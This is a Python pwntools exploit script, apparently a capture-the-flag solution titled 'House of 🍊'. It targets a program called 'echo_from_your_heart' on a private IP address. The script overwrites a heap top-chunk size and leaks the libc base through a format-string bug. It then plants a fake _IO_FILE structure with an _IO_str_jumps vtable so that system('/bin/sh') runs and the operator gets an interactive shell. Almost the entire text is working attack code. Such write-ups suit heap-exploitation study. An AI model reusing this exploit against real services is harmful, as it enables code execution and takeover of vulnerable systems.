House of 🍊
#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']  # gdb (see debug()) is opened in a horizontal tmux split
context(arch = 'amd64' , os = 'linux', log_level='debug')  # 64-bit Linux target; 'debug' echoes every byte sent/received
# p = process('./echo_from_your_heart')
# The remote connection is opened at import time; the local-process line above is kept commented for offline runs.
p = remote('192.168.0.102', 1000)
libc = ELF('libc.so')  # the target's libc: every symbol offset used below is only valid for this exact build
def debug(p, cmd):
    """Attach gdb to the running tube `p` using the gdb script `cmd`, then pause.

    `pause()` blocks until the operator resumes, so breakpoints set by `cmd`
    can be reached before the script continues. Not called in the current
    flow (the call site in LEAK is commented out).
    """
    gdb.attach(p, cmd)
    # Hold the script here until the operator is ready to continue.
    pause()
def add(len, content):
    """Answer the target's two prompts: the length prompt with `len`, then the word prompt with `content`.

    The parameter name `len` shadows the builtin; it is kept for interface
    compatibility. `content` is sent verbatim (followed by a newline by
    sendlineafter), so it may contain binary bytes.
    """
    exchanges = (
        ('lens of your word: ', str(len)),
        ('word: ', content),
    )
    for prompt, answer in exchanges:
        p.sendlineafter(prompt, answer)
def pack_file_64(_flags = 0,
                 _IO_read_ptr = 0,
                 _IO_read_end = 0,
                 _IO_read_base = 0,
                 _IO_write_base = 0,
                 _IO_write_ptr = 0,
                 _IO_write_end = 0,
                 _IO_buf_base = 0,
                 _IO_buf_end = 0,
                 _IO_save_base = 0,
                 _IO_backup_base = 0,
                 _IO_save_end = 0,
                 _IO_marker = 0,
                 _IO_chain = 0,
                 _fileno = 0,
                 _lock = 0,
                 _mode = 0):
    """Serialize the given fields into a 0xd8-byte blob laid out like a 64-bit glibc `_IO_FILE`.

    The fourteen pointer-sized fields are packed in declaration order as
    little-endian qwords, followed by `_fileno` as a dword (0x74 bytes in
    total). The gap up to offset 0x88 is zero-filled before `_lock`, the gap
    up to 0xc0 before `_mode`, and the result is zero-padded to 0xd8 bytes.
    Those offsets are hard-coded and assumed to match the libc build in
    `libc.so`; they are not derived from it.

    Returns a str (Python 2 byte string) of exactly 0xd8 bytes.
    """
    qword_fields = [
        _flags,
        _IO_read_ptr,
        _IO_read_end,
        _IO_read_base,
        _IO_write_base,
        _IO_write_ptr,
        _IO_write_end,
        _IO_buf_base,
        _IO_buf_end,
        _IO_save_base,
        _IO_backup_base,
        _IO_save_end,
        _IO_marker,
        _IO_chain,
    ]
    blob = ''.join(p64(value) for value in qword_fields) + p32(_fileno)
    # Zero-fill to the fixed offsets of _lock and _mode, then pad to the full struct size.
    blob = blob.ljust(0x88, "\x00") + p64(_lock)
    blob = blob.ljust(0xc0, "\x00") + p64(_mode)
    return blob.ljust(0xd8, "\x00")
def LEAK():
    """Drive the whole interaction with the remote target `p`, then hand the session to the operator.

    Three rounds of add() are sent: filler plus a fake chunk header, a
    format string whose echoed value is used to compute the libc base, and
    a fake `_IO_FILE` built by pack_file_64() with a vtable pointer and the
    address of `system` appended. All offsets (241, the 0xfe1 size, the
    symbol lookups) are specific to the `libc.so` loaded at module level.
    Written for Python 2 (`.next()` on the search iterator, str payloads).
    """
    # Round 1: 0x10 bytes of filler followed by a fake chunk header (prev_size 0, size 0xfe1).
    payload = 'b' * 0x10 + p64(0) + p64(0xfe1)
    add(0x10, payload)# 0xfe1
    # debug(p, 'b *0x400A1E\n')
    # Round 2: seven '%d' consume the first seven format arguments; the
    # '%ld' after the '#' marker is the value read back below.
    payload = '%d' * 7 + '#' + '%ld'
    add(0x1000, payload)
    p.recvuntil('#')
    # The echoed value is presumably a return address 241 bytes into __libc_start_main
    # (a constant for this libc build); subtracting both yields the libc base.
    # `libc_addr` is an unused alias of `libc_address`.
    libc_address = libc_addr = int(p.recvline()) - 241 - libc.symbols['__libc_start_main']
    success('LIBC: ' + str(hex(libc_address)))
    pause()
    # Round 3: a fake _IO_FILE. Only the fields set here are non-zero; every
    # other field of the 0xd8-byte struct is zero-filled by pack_file_64().
    payload = pack_file_64(
        _flags= 0,
        _IO_read_ptr= 0x61,
        _IO_read_base= libc_address + libc.symbols['_IO_list_all'] - 0x10,
        _IO_write_base= 2,
        _IO_write_ptr= 3,
        _IO_buf_base= libc_address + libc.search('/bin/sh\x00').next(),  # Python 2 iterator API
        _mode= 0,
    )
    # Appended after the struct: a vtable pointer (_IO_str_jumps - 8), a zero qword, and system's address.
    payload += p64(libc_address + libc.symbols['_IO_str_jumps'] - 8) + p64(0) + p64(libc_address + libc.symbols['system'])
    payload = 'b' * 0x10 + payload
    add(0x10, payload)
    # A final length prompt is answered (0x18) without a following word; control then goes to the operator.
    p.sendlineafter('lens of your word:', str(0x18))
    p.interactive()
if __name__ == "__main__":
    # Entry point: the whole run lives in LEAK(); note that the remote
    # connection and libc load already happened at import time above.
    LEAK()